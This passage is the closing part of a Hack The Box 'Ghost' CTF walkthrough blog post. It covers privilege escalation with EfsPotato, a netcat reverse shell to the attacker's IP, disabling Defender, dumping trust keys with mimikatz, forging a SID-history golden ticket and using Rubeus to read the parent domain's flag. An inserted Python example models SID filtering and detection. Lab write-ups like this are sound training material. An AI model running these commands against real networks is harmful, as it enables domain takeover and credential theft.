Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=1a339b90)
[+] Get Token: 888
[!] process with pid: 3408 created.
==============================
nt authority\system

Now let’s simply get a reverse shell as nt authority\system using netcat:

PS C:\temp> iwr 10.10.16.25/nc64.exe -outfile nc64.exe
PS C:\temp> ./efs.exe 'c:/temp/nc64.exe 10.10.16.25 9001 -e powershell.exe'

And we’re in:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49799
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami
whoami
nt authority\system

Domain Trust Abuse

However, going into the administrator desktop we don’t find a flag:

PS C:\users\administrator\desktop> ls
ls
PS C:\users\administrator\desktop>

This suggests we are not done yet. Recall that earlier, when checking BloodHound, we saw a trust relationship between ghost.htb and corp.ghost.htb:

Trust

Now that we are administrators on the DC of ghost.htb, we can dump the domain trust keys and abuse them.
Let’s first disable AV:

PS C:\users\administrator\desktop> Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\users\administrator\desktop>

Now let’s bring mimikatz over and dump the trust keys:

PS C:\users\administrator\desktop> ./mimi.exe "lsadump::trust /patch" exit
./mimi.exe "lsadump::trust /patch" exit

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: CORP.GHOST.HTB (GHOST-CORP / S-1-5-21-2034262909-2733679486-179904498)

Domain: GHOST.HTB (GHOST / S-1-5-21-4084500788-938703357-3654145966)
[ In ] CORP.GHOST.HTB -> GHOST.HTB
* 4/3/2025 7:35:00 AM - CLEAR - f5 b6 25 22 56 6c 5e e4 49 b8 28 10 1f e5 2f 26 08 11 a6 11 32 48 81 5a 5e d7 df 5c 40 be 65 85 b9 e2 ee 33 44 15 96 07 8f c7 dc 32 39 88 77 be 56 d4 1a c8 9e c5 9c bb e8 31 31 77 b2 e2 e8 35 f2 57 a0 f5 44 65 fe c4 af f2 4b 60 b3 cf db 3c 85 bc 7e 6e a8 d8 63 af d3 a8 1c b2 dd 49 39 37 04 dd e7 67 0d 56 89 4c 47 aa 83 2b 85 e8 7a d2 48 c0 19 65 df 89 f5 70 4c d0 97 06 67 c0 f1 31 00 21 f7 63 e3 31 f1 9c 46 fe d7 2f ff b8 8e cf 61 3e c5 26 e6 db 69 3d 26 4c a2 6b 75 ba 6c c9 52 bd 7c 30 03 cf 70 59 18 25 b8 4c 3e c7 2b ae 0c 53 b7 a1 70 a1 d6 e1 91 7e 51 60 d4 c2 00 40 23 c4 71 10 4d e0 f9 0d a5 27 b4 46 ee 01 48 cf d8 8c e4 bf 1d 7a 0d 86 28 9f bf 1e 11 c5 30 26 9b 34 61 5e b5 64 db be db 8d f0 6f d8 84 90 94
* aes256_hmac 1c8efba1ea334462d247e0513a99525eb2844820b3134679ad79f99b989f9954
* aes128_hmac b0130dc0a4eff3cf59e7b3cd105cad67
* rc4_hmac_nt 61f02da833df265bbc885f02b950daa2

[ Out ] GHOST.HTB -> CORP.GHOST.HTB
* 4/3/2025 7:46:54 AM - CLEAR - 35 f5 dd 6d 26 01 1b fc 6b d3 38 93 40 05 c4 ca 58 c1 f3 67 50 03 09 6d 81 9f c7 9d 76 26 8b e5 a2 9d ce 90 f6 bf 18 b3 e8 d7 13 52 47 aa ff 03 da 85 06 bb 05 41 53 9b 6c 7a ad 48 96 ec a6 84 dc 3a 64 a0 37 72 62 ca 05 77 d2 d6 03 c0 9d 5b d5 0f 6c 38 33 25 1a bd 2b 3e 8c 84 ff 98 41 56 84 05 cf 01 bc ec bd a8 f0 f1 4e 82 4a 4c f3 0b 36 15 04 72 80 43 7e f3 d9 f2 eb 33 aa ae f4 ae be e3 4a e5 23 f2 5e 75 7e 7b 89 ee 6c a8 59 da 2d 4a 31 f2 e9 57 fe 24 13 e6 ed c4 51 05 cd af b1 df 3e fd d1 e9 ac 4c 77 eb 7a 94 34 f9 fa 21 e8 ec 5e 0d fb e3 c6 ab 44 4f 1d cf 1e ee a9 e3 92 c8 3b 67 a2 aa 77 b1 af 5f 4b 04 61 86 1e 3a 60 ff 94 ef 89 6b a2 45 a2 9c ca db 1b 38 8a 5f ce f8 0f a1 5e 4e 21 f9 7a c9 e6 76 75 f0 e3 66
* aes256_hmac c1a816225b6e618e302b706945dd36c0ff57ed74344dc934d7445818e381b2eb
* aes128_hmac 07b599b214cd961bdc9d9184796e7842
* rc4_hmac_nt 97cf971f2c9e3886b338d3712f058a31

[ In-1] CORP.GHOST.HTB -> GHOST.HTB
* 7/22/2024 9:21:26 AM - CLEAR - de 0b 64 63 58 9d ed e1 bc 36 c0 50 7c 4d 41 6d bd 82 72 e9 98 9b 13 58 b8 68 f1 94 8c ca 12 50 9b af 45 7d 0a 4d 4e 40 e2 7d 12 59 72 2f 87 22 64 c8 fa b2 96 8d aa c1 f1 17 a3 e7 aa 2b ec 87 b5 59 57 71 6f 33 87 4c e0 8a 8b 03 38 a2 71 b6 d5 0b 61 fd 7e 14 3e 46 16 d9 29 d8 f6 f9 05 69 3f b7 4f c1 28 0b 7e ec e5 46 ab 7e e8 2c 8b be 70 b5 d9 6c 96 1b fb 56 33 bc 41 15 b5 73 42 25 54 15 4b b6 fc 55 07 81 60 4a 6b 4c 22 a2 55 61 e5 91 e6 75 e3 62 d4 9a 37 77 bd 63 90 8e 6a 2a 2c c6 88 8f 57 44 7a 9e 35 aa e5 6a 2b 5f c8 0a 8c 4f cb bd af c9 60 59 ff 15 d9 fd cf 27 93 9f f7 19 9e 91 2b 38 d7 0e ec c9 43 e6 8c 3b 60 02 5f b7 c3 c1 67 c2 6b 44 db 1f 9c f7 72 2f 3a 54 6e 62 02 c9 46 d1 b7 3d 26 54 d0 4f 35 65 a8 3f
* aes256_hmac de2e49c70945c0cb0dec99c93587de84f0b048843b8e295c6da720ba85545ffe
* aes128_hmac b55ca148bc95f95b8cb72f67661e1a08
* rc4_hmac_nt 0b0124f5d6c07ad530d6bf6a6404fdaa

[Out-1] GHOST.HTB -> CORP.GHOST.HTB
* 4/3/2025 7:46:54 AM - CLEAR - 78 10 13 24 91 0a 57 22 71 4e f6 ef 53 6a d8 54 02 97 63 0b 78 28 41 b7 5e 5e e6 b7 50 03 35 96 f2 e5 8b a3 c1 21 fa f6 01 f5 5f 7b 38 98 bc 8b 2b f5 3e 91 ce 8a 01 06 59 c0 9b 19 8c d8 d3 1a 17 9f d4 f1 b2 cb a0 49 f6 7f 97 f7 a0 79 63 bb 20 4a bf a3 d9 dd b1 13 20 c6 a0 84 a2 ea 65 79 6a b6 d3 db 17 e9 be b8 c1 35 57 38 c8 3b a6 6a 90 32 66 ba 0e bd fd 67 bf f4 e9 3c f2 e5 37 94 84 d6 c0 71 d3 42 85 ef 4e 94 ac 56 0f df 05 77 1b 74 57 4f a2 07 07 a1 d6 8e ee a1 cd 6a c0 4c d9 3f 16 0a fa 47 07 45 45 ad b5 6d e4 01 b1 e4 bf 76 c2 8e 5b 4e f4 04 ed 08 e4 e0 7e d8 18 5a f5 df 07 c3 97 3d 7e 6d 28 1e c1 1a ec 6d 06 83 0f 27 ea c8 00 af 92 c9 1f f6 50 45 f5 c1 bb 4a 09 bb d6 df 6b cf d6 fe fe d8 44 bb 19 90 46 0b
* aes256_hmac b50449e019e0a55f9227fb2e830b044e9e9ad9952e2249e5de29f2027cd8f40d
* aes128_hmac 81f4c2f21a640eed29861d71a619b4bb
* rc4_hmac_nt ea4e9954536eb29091fc96bbce83be23


mimikatz(commandline) # exit
Bye!

Now we should have all we need.

SIDHistory Spoofing

The next step is to get the SIDs of both domains:

PS C:\users\administrator\desktop> wmic useraccount get name,sid
wmic useraccount get name,sid
Name                  SID
Administrator         S-1-5-21-2034262909-2733679486-179904498-500
Guest                 S-1-5-21-2034262909-2733679486-179904498-501
krbtgt                S-1-5-21-2034262909-2733679486-179904498-502
Administrator         S-1-5-21-4084500788-938703357-3654145966-500
Guest                 S-1-5-21-4084500788-938703357-3654145966-501
krbtgt                S-1-5-21-4084500788-938703357-3654145966-502
kathryn.holland       S-1-5-21-4084500788-938703357-3654145966-3602
cassandra.shelton     S-1-5-21-4084500788-938703357-3654145966-3603
robert.steeves        S-1-5-21-4084500788-938703357-3654145966-3604
florence.ramirez      S-1-5-21-4084500788-938703357-3654145966-3606
justin.bradley        S-1-5-21-4084500788-938703357-3654145966-3607
arthur.boyd           S-1-5-21-4084500788-938703357-3654145966-3608
beth.clark            S-1-5-21-4084500788-938703357-3654145966-3610
charles.gray          S-1-5-21-4084500788-938703357-3654145966-3611
jason.taylor          S-1-5-21-4084500788-938703357-3654145966-3612
intranet_principal    S-1-5-21-4084500788-938703357-3654145966-3614
gitea_temp_principal  S-1-5-21-4084500788-938703357-3654145966-3615

We can also get the SID of CORP.GHOST.HTB from BloodHound: S-1-5-21-2034262909-2733679486-179904498

Now we can forge a Golden Ticket with mimikatz, adding the parent domain’s SID to the ticket’s SID history:

PS C:\users\administrator\desktop> .\mimi.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\mimi.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:61f02da833df265bbc885f02b950daa2 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
User : Administrator
Domain : CORP.GHOST.HTB (CORP)
SID : S-1-5-21-2034262909-2733679486-179904498-502
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-519 ;
ServiceKey: 61f02da833df265bbc885f02b950daa2 - rc4_hmac_nt
Service : krbtgt
Target : GHOST.HTB
Lifetime : 4/4/2025 3:24:41 AM ; 4/2/2035 3:24:41 AM ; 4/2/2035 3:24:41 AM
-> Ticket : golden.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

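To see why the injected SID is honoured here and what would stop it, this added example (my own code, not the writeup's, mimikatz's or Rubeus's) applies a simplified SID filter quarantine rule to the PAC of the ticket above and shows what a detection on the receiving domain should flag; parent-child trusts inside a forest do not quarantine by default. The SID values are taken from the mimikatz and wmic output above; the rule model is a simplification of Microsoft's filtering, not its implementation.

```python
"""SID-history check for a referral ticket crossing a domain trust.

Added example; not code from the writeup, mimikatz or Rubeus. Models the
quarantine rule GHOST.HTB would apply to a ticket arriving from the trusted
domain CORP.GHOST.HTB: every SID not rooted in the trusted domain's SID is
discarded. The model is a simplification of Microsoft's SID filtering.
"""
import re

SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

# Well-known RIDs that should never arrive through a trust from another domain.
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

# Domain SIDs from the writeup's mimikatz lsadump::trust output.
GHOST_SID = "S-1-5-21-4084500788-938703357-3654145966"
CORP_SID = "S-1-5-21-2034262909-2733679486-179904498"


def split_sid(sid):
    """Return (domain_sid, rid) for an S-1-5-21 account or group SID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid_text = m.group(1)
    return sid[: -len(rid_text) - 1], int(rid_text)


def quarantine_filter(pac_sids, trusted_domain_sid):
    """Apply the quarantine rule: keep only SIDs rooted in the trusted domain.

    Returns (kept, dropped) in the original order.
    """
    kept, dropped = [], []
    for sid in pac_sids:
        domain, _ = split_sid(sid)
        (kept if domain == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def suspicious_extra_sids(extra_sids, trusted_domain_sid, local_domain_sid):
    """Detection view on the inbound PAC's ExtraSids: a SID of the receiving
    domain that maps to a privileged RID is named; any other SID not rooted in
    the trusted domain is flagged generically."""
    hits = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain == local_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
        elif domain != trusted_domain_sid:
            hits.append((sid, "not rooted in trusted domain"))
    return hits


# Constructed PAC contents mirroring the ticket forged in the writeup: the user
# (RID 500) and group RIDs 513 512 520 518 519 from CORP.GHOST.HTB, plus the
# GHOST.HTB Enterprise Admins SID supplied via /sids.
FORGED_PAC = [f"{CORP_SID}-500"] + [f"{CORP_SID}-{r}" for r in (513, 512, 520, 518, 519)]
FORGED_EXTRA = [f"{GHOST_SID}-519"]

if __name__ == "__main__":
    kept, dropped = quarantine_filter(FORGED_PAC + FORGED_EXTRA, CORP_SID)
    print("dropped by quarantine:", dropped)
    print("flagged for detection:", suspicious_extra_sids(FORGED_EXTRA, CORP_SID, GHOST_SID))
```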

Now we can use that ticket to request access to the CIFS (file system) service on the parent domain using Rubeus:

PS C:\users\administrator\desktop> .\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[*] Using domain controller: dc01.ghost.htb (10.0.0.254)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

doIFajCCBWagAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBENJRlMbDmRjMDEuZ2hvc3QuaHRio4IEJjCCBCKgAwIBEqEDAgEEooIEFASCBBAfmBVyZplulQ+JK/AFbeGjXRlnfZg9DrIYovTDG2imZXJyGI1krygi1vSLWaldh4hcRBbOqto8IINPgYgG67CBd1YT2zWCgJsaELj7+X36BCALdrJg1CCwmw47Xy2KTdyF87TcJNjGypbpBvJOZWIOoRy5KXo6sh0Fd9yH/aOaofNOj5Q71IbIkYdjmTXmpYUhMf9pF/+igtoGTTTVgpiN74AKyI8k8TrwULa+K+mpeQl8I0Uy5inZUZy32IQdsmPMz9N87uZb7YT6eg0TMxO/OD+Xjipt4ZANd/p72D19Zmc6ZUaPSWyM5TaEVytLfKY0/lixC6SxvGAQGGFyRqNVvbVfxULYGe9aEfzlz6Aq4KP2fc5NnK/S7p89QxsrupYqGt2gLySSkRqJxCCgwt75DEDax85iaBbJFi4rvDtebjL+/EU9f3ZwbLvqF4bhMPjTBtfvp/SqLAVyo2PqKMhrJGpoLr9kWm7+XwO1oyn/E01v4AYN5rJf988mve4fntdalzOxSQR5cCPO8Zx9tRDIYRLVsP1lvXZ8QfoJBz0YWwQv2pSqNVEY4A3TCVc+VEmNKR0JlUW4LK5S6nEgtB3wrDMITeXUR4sQRhX3/P+pAPegILVNVtNsTTPRtf5Pn8waiofqKQEK83984gJVyt+xZv4f1uhgjj7HnPfuew6fD7SF9VCUKmjnLay47Yy7W+chEAG5C274Xkv7P+U++NhL7Mgm0NbRHoBjM87/on4AI4EccD+1Xt/SvdbVWusBDDnPeNlWy51TUGVDT6TBkDwYC0ad824kIgBHq1amT27ON+rWgQW9nfXP0sNkz3MfXAx9YLeG1d6B11OCTHdUVVjsc2zx6NU4gimQHGxvXUo1VWMx/+Cnou+lTGSuC9PzWyW+VEMgq2QJdeUAhWjPag/UFhhLaP52HRNSaKz5fX9Cm7mvgHDDYrLORA5rxweVjnpa9fXzsb+f2nvBFnJbhgnYP/+oZ+L08pgbOcOipd0k5DfoRTP03+2nmRs9ctjsearNqhq0DQKJNLawIJ9Xe14RxOoRFB8tl0xUJbeAMGrOG+13yscM4MKyuZqa02RURbDIoOVqlAujO2voy6Yqxqbm9dZBYQIKE+ioGiOIwDQ9fk1QMSKWvG5ySqk2Tq9gHzf5eFz0NNp9mPZDOqrJVAjCfP0GV0throJjuB4hI4ag7s5BXyF6oLpKx3ysME/hxvQen+ap2EEfpqEKYzlnpWorwq+ARTjGT2jmx3y83bROZRa66Uzzg12RRMP83eX9jlyQq9P+x2RB5lbmdvWl/NvpsB4CKfdFYomGIHHVUNjyvKWtiYHDKuFzc8RFSlkcDJQ4vAcgaCdZonTvt0QAdVhbWC8iqekFH0aIGi0lmAeX2qOB6jCB56ADAgEAooHfBIHcfYHZMIHWoIHTMIHQMIHNoCswKaADAgESoSIEICt1CHiBMx8wt5i/NBi207Oj1SeO9oP8sypcsuL3g7OxoRAbDkNPUlAuR0hPU1QuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI1MDQwNDEwMjUwMVqmERgPMjAyNTA0MDQyMDI1MDFapxEYDzIwMjUwNDExMTAyNTAxWqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRDSUZTGw5kYzAxLmdob3N0Lmh0Yg==

ServiceName : CIFS/dc01.ghost.htb
ServiceRealm : GHOST.HTB
UserName : Administrator
UserRealm : CORP.GHOST.HTB
StartTime : 4/4/2025 3:25:01 AM
EndTime : 4/4/2025 1:25:01 PM
RenewTill : 4/11/2025 3:25:01 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : K3UIeIEzHzC3mL80GLbTs6PVJ472g/yzKlyy4veDs7E=


And now we can claim our root flag:

PS C:\users\administrator\desktop> type \\DC01.ghost.htb\c$\users\administrator\desktop\root.txt
type \\DC01.ghost.htb\c$\users\administrator\desktop\root.txt
d74463e00bbe6318b1fc2b3573a3c6e4
PS C:\users\administrator\desktop>

That was it for Ghost, hope you learned something new!
-0xkujen

  • Title: Hackthebox: Ghost
  • Author: Foued SAIDI
  • Created at : 2025-04-03 15:29:40
  • Updated at : 2025-04-05 07:44:31
  • Link: https://kujen5.github.io/2025/04/03/Hackthebox-Ghost/
  • License: This work is licensed under CC BY-NC-SA 4.0.